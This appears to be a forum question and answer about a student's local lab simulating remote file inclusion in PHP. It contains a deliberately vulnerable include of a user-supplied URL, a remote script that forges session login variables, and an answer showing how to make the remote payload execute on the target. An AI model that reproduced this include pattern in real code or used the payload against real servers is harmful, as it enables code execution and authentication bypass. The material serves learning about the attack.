Remotely included script cannot set session variables

Question

I'm trying to simulate a remote file inclusion attack on my local web server as part of a course I am taking. I got the idea of being able to "logging" in on a website I set up without really logging via the system, rather by just setting the appropriate session variables in a remote script and then including it in the code of my website. Now I got the script to be included and run on my website (I can echo strings etc.) but I cannot seem to set session variables using the remote script. Does anybody have any idea why?

Here is the code of the website so far:

index.php:

<?php session_start(); ?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Document</title>
</head>
<body>
  <?php require("php/imageupload.php"); ?>
  <p>Logged in as: <?php echo $_SESSION['username']; ?></p>
</body>
</html>

imageupload.php:

<?php
  session_start();
  $file = $_GET["file"];
  require($file);
?>

hack.php (remote file):

<?php
  session_start();
  $_SESSION['username'] = "foo";
  echo "test";
?>

When I request http://localhost/index.php?file=http://127.0.0.1/hack.php I get the following response:

test

Logged in as:

Answer 1

The included file is actually executed on your server, not on the vulnerable server when including it (which in this case is the same server, but it's still wrong behavior).

What is included is actually the result of the PHP execution ("test" in this case).

What you want is to return a file that actually contains the code. So you could either transform the hack.php file into hack.txt, or simply adjust the code to echo the desired payload:

<?php
echo '<?php
  session_start();
  $_SESSION[\'username\'] = "foo";
  echo "test";
?>';